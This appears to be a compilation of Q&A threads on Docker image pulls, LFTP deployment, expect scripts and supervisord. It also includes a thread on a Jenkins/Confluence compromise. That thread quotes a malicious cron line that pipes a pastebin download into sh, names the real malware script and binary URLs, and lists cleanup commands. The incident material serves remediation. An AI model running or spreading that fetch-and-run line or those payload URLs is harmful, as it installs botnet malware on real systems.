Docker. How to resume downloading image when interrupted? - docker

How can I resume pull when disconnected? The pull process always start from the beginning every time I run docker pull some-image again after disconnected. My connection is so unstable that even downloading just a 100MB image take so long and almost fails every time. So, it is almost impossible for me to pull a bigger image. So, how can I resume the pull process?

Update:
The pull process will now automatically resume based on which layers have already been downloaded. This was implemented with https://github.com/moby/moby/pull/18353.
Old:
There is no resume feature yet. However there are discussions around this feature being implemented with docker's download manager.

Docker's code isn't as updated as the moby in development repository on github. People have been having issues for several years relating to this. I had tried to manually use several patches which aren't in the upstream yet, and none worked decent.
The github repository for moby (docker's development repo) has a script called download-frozen-image-v2.sh. This script uses bash, curl, and other things like JSON interpreters via command line. It will retrieve a docker token, and then download all of the layers to a local directory. You can then use 'docker load' to insert into your local docker installation.
It does not do well with resume though. It had some comment in the script relating to 'curl -C' isn't working. I had tracked down, and fixed this problem. I made a modification which uses a ".headers" file to retrieve initially, which has always returned a 302 while I've been monitoring, and then retrieves the final using curl (+ resume support) to the layer tar file. It also has to loop on the calling function which retrieves a valid token which unfortunately only lasts about 30 minutes.
It will loop this process until it receives a 416 stating that there is no resume possible since it's ranges have been fulfilled. It also verifies the size against a curl header retrieval. I have been able to retrieve all images necessary using this modified script. Docker has many more layers relating to retrieval, and has remote control processes (Docker client) which make it more difficult to control, and they viewed this issue as only affecting some people on bad connections.
I hope this script can help you as much as it has helped me:
Changes:
fetch_blob function uses a temporary file for its first connection. It then retrieves 30x HTTP redirect from this. It attempts a header retrieval on the final url and checks whether the local copy has the full file. Otherwise, it will begin a resume curl operation. The calling function which passes it a valid token has a loop surrounding retrieving a token, and fetch_blob which ensures the full file is obtained.
The only other variation is a bandwidth limit variable which can be set at the top, or via "BW:10" command line parameter. I needed this to allow my connection to be viable for other operations.
Click here for the modified script.
In the future it would be nice if docker's internal client performed resuming properly. Increasing the amount of time for the token's validation would help tremendously..
Brief views of change code:
#loop until FULL_FILE is set in fetch_blob.. this is for bad/slow connections
while [ "$FULL_FILE" != "1" ];do
local token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')"
fetch_blob "$token" "$image" "$layerDigest" "$dir/$layerTar" --progress
sleep 1
done
Another section from fetch_blob:
while :; do
#if the file already exists.. we will be resuming..
if [ -f "$targetFile" ];then
#getting current size of file we are resuming
CUR=`stat --printf="%s" $targetFile`
#use curl to get headers to find content-length of the full file
LEN=`curl -I -fL "${curlArgs[#]}" "$blobRedirect"|grep content-length|cut -d" " -f2`
#if we already have the entire file... lets stop curl from erroring with 416
if [ "$CUR" == "${LEN//[!0-9]/}" ]; then
FULL_FILE=1
break
fi
fi
HTTP_CODE=`curl -w %{http_code} -C - --tr-encoding --compressed --progress-bar -fL "${curlArgs[#]}" "$blobRedirect" -o "$targetFile"`
if [ "$HTTP_CODE" == "403" ]; then
#token expired so the server stopped allowing us to resume, lets return without setting FULL_FILE and itll restart this func w new token
FULL_FILE=0
break
fi
if [ "$HTTP_CODE" == "416" ]; then
FULL_FILE=1
break
fi
sleep 1
done

Try this
ps -ef | grep docker
Get PID of all the docker pull command and do a kill -9 on them. Once killed, re-issue the docker pull <image>:<tag> command.
This worked for me!

Related

Jenkins High CPU Usage Khugepageds

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

Continuous deployment using LFTP gets "stuck" temporarily after about 10 files

I am using GitLab Community Edition and GitLab runner CI setup to deploy (synchronize) a bunch of JSON files on a server using LFTP. This job however, seems to "freeze" for a few minutes every 10 files roughly. Having to synchronize roughly 400 files sometimes, this job simply crashes because it sometimes takes more than an hour to complete. The JSON files are all 1KB. Neither the source and target servers should have any firewalls rate limiting the FTP. Both are hosted at OVH.
The following LFTP command is executed in orer to synchronize everything:
lftp -v -c "set sftp:auto-confirm true; open sftp://$DEVELOPMENT_DEPLOY_USER:$DEVELOPMENT_DEPLOY_PASSWORD#$DEVELOPMENT_DEPLOY_HOST:$DEVELOPMENT_DEPLOY_PORT; mirror -Rev ./configuration_files configuration/configuration_files --exclude .* --exclude .*/ --include ./*.json"
Job is ran in Docker, using this container to deploy everything. What could cause this?
For those of you coming from google we had the exact same setup. The way to get LFTP to stop hanging when running in a docker or some other CI you can use this command:
lftp -c "set net:timeout 5; set net:max-retries 2; set net:reconnect-interval-base 5; set ftp:ssl-force yes; set ftp:ssl-protect-data true; open -u $USERNAME,$PASSWORD $HOST; mirror dist / -Renv --parallel=10"
This does several things:
It makes it so it won't wait forever or get into a continuous loop
when it can't do a command. This should speed things along.
Makes sure we are using SSL/TLS. If you don't need this remove those
options.
Synchronizes one folder to the new location. The options -Renv can
be explained here: https://lftp.yar.ru/lftp-man.html
Lastly in the gitlab CI I set the job to retry if it fails. This will spin up a new docker instance that gets around any open file or connection limitations. The above LFTP command will run again but since we are using the -n flag it will only move over the files that were missed on the first job if it doesn't succeed. This gets everything moved over without hassle. You can read more about CI job retrys here: https://docs.gitlab.com/ee/ci/yaml/#retry
Have you looked at using rsync instead? I'm fairly sure you can benefit from the incremental copying of files as opposed to copying the entire set over each time.

Move file downloaded in Dockerfile to harddrive

First off, I really lack a lot of knowledge regarding Docker itself and its structure. I know that it'd be way more beneficial to learn the basics first, but I do require this to work in order to move on to other things for now.
So within a Dockerfile I installed wget & used it to download a file from a website, authentification & download are successful. However, when I later try move said file it can't be found, and it doesn't show up using e.g explorer either (path was specified)
I thought it might have something to do with RUN & how it executes the wget command; I read that the Id can be used to copy it to harddrive, but how'd I do that within a Dockerfile?
RUN wget -P ./path/to/somewhere http://something.com/file.txt --username xyz --password bluh
ADD ./path/to/somewhere/file.txt /mainDirectory
Download is shown & log-in is successful, but as I mentioned I am having trouble using that file later on as it's not to be located on the harddrive. Probably a basic error, but I'd really appreciate some input that might lead to a solution.
Obviously the error is produced when trying to execute ADD as there is no file to move. I am trying to find a way to mount a volume in order to store it, but so far in vain.
Edit:
Though the question is similiar to the "move to harddrive" one, I am searching for ways to get the id of the container created within the Dockerfile in order to move it; while the thread provides such answers, I haven't had any luck using them within the Dockerfile itself.
Short answer is that it's not possible.
The Dockerfile builds an image, which you can run as a short-lived container. During the build, you don't have (write) access to the host and its file system. Which kinda makes sense, since you want to build an immutable image from which to run ephemeral containers.
What you can do is run a container, and mount a path from your host as a volume into the container. This is the only way how you can share files between the host and a container.
Here is an example how you could do this with the sherylynn/wget image:
docker run -v /path/on/host:/path/in/container sherylynn/wget wget -O /path/in/container/file http://my.url.com
The -v HOST:CONTAINER parameter allows you to specify a path on the host that is mounted inside the container at a specified location.
For wget, I would prefer -O over -P when downloading a single file, since it makes it really explicit where your download ends up. When you point -O to the location of the volume, the downloaded file ends up on the host system (in the folder you mounted).
Since I have no idea what your image or your environment looks like, you might need to tweak one or two things to work well with your own image. As a general recommendation: For basic commands like wget or curl, you can find pre-made images on Docker Hub. This can be quite useful when you need to set up a Continuous Integration pipeline or so, where you want to use wget or curl but can't execute it directly.
Use wget -O instead of -P for specific file download
for e.g.,
RUN wget -O /tmp/new_file.txt http://something.com --username xyz --password bluh/new_file.txt
Thanks

Updating IOS's via SCP in bash with expect

Good day. I am attempting to create/run a script that will allow me to send an updated IOS from a server to my network devices. The following code works when I put in a manual IP address right before the ":flash" command.
#!/user/bin/expect
set IOSroot "/xxxxx/xxx/c3750e-universalk9-mz.150-2.SE10a.bin"
set pw xxxxxxxxxxxxxxxxxxx
spawn scp $IOSroot 1.1.1.1:flash:/c3750e-universalk9-mz.150-2.SE10a.bin
expect "TACACS Password:"
send "$pw\r"
interact
The code there works great and as expected. The issue arises when I try to use a file called "ioshost" with a list of IP's and use that within this script to get some automation. I have tried various things to get this to work. Some of them are as follows:
Settings Variables
IPHosts=$(cat ioshost)
set IPHost 'cat ioshost'
Along with trying to use the read/do command...
while read line; do
spawn scp $IOSroot $line:flash:/c3750e-universalk9-mz.150-2.SE10a.bin
done < ioshost
None of these seem to work and I am looking for guidance. Please note I understand that setting a password is not best practice but setting RSA keys as mentioned in other articles is not allowed so I am forced to do it this way.
Thank you for your time.
You can use one Expect script and one Bash script.
First update your Expect script a bit:
#!/user/bin/expect
set IOSroot "/xxxxx/xxx/c3750e-universalk9-mz.150-2.SE10a.bin"
set pw xxxxxxxxxxxxxxxxxxx
spawn scp $IOSroot [lindex $argv 0]:flash:/c3750e-universalk9-mz.150-2.SE10a.bin
# ^^^^^^^^^^^^^^^^
expect "TACACS Password:"
send "$pw\r"
interact
Then write a simple Bash for loop:
for host in $(<ioshost); do
expect /your/script.exp $host
done

Docker - Handling multiple services in a single container

I would like to start two different services in my Docker container and exit the container as soon as one of them exits. I looked at supervisor, but I can't find how to get it to quit as soon as one of the managed applications exits. It tries to restart them up to three times, as is the standard setting and then just sits there doing nothing. Is supervisor able to do this or is there any other tool for this? A bonus would be if there also was a way to let both managed programs write to stdout, tagged with their application name, e.g.:
[Program 1] Some output
[Program 2] Some other output
[Program 1] Output again
Since you asked if there was another tool... we designed and wrote a powerful replacement for supervisord that is designed specifically for Docker. It automatically terminates when all applications quit, as well as has special service settings to control this behavior, plus will redirect stdout with tagged syslog-compatible output lines as well. It's open source, and being used in production.
Here is a quick start for Docker: http://garywiz.github.io/chaperone/guide/chap-docker-simple.html
There is also a complete set of tested base-images which are a good example at: https://github.com/garywiz/chaperone-docker, but these might be overkill and the earlier quickstart may do the trick.
I found solutions to both of my requirements by reading through the docs some more.
Exit supervisord on application exit
This can be achieved by using a custom eventlistener. I had to add the following segment into my supervisord configuration file:
[eventlistener:shutdownevent]
command=/shutdownhandler.sh
events=PROCESS_STATE_EXITED
supervisord will start the referenced script and upon the given event being triggered (PROCESS_STATE_EXITED is triggered after the exit of one of the managed programs and it not restarting automatically) will send a line containing data about the event on the scripts stdin.
The referenced shutdownhandler-script contains:
#!/bin/bash
while :
do
echo -en "READY\n"
read line
kill $(cat /supervisord.pid)
echo -en "RESULT 2\nOK"
done
The script has to indicate being ready by sending "READY\n" on its stdout, after which it may receive an event data line on its stdin. For my use case upon receival of a line (meaning one of the managed programs has exited), a SIGTERM is sent to the supervisord process being found by the pid it leaves in its pid file (situated in the root directory by default). For technical completeness, I also included a positive answer for the eventlistener, though that one should never matter.
Tagged output on stdout
I did this by simply starting a tail process in the background before starting supervisord, tailing the programs output log and piping the lines through ts (from the moreutils package) to prepend a tag to it. This way it shows up via docker logs with an easy way to see which program actually wrote the line.
tail -fn0 /var/log/supervisor/program1.log | ts '[Program 1]' &

Resources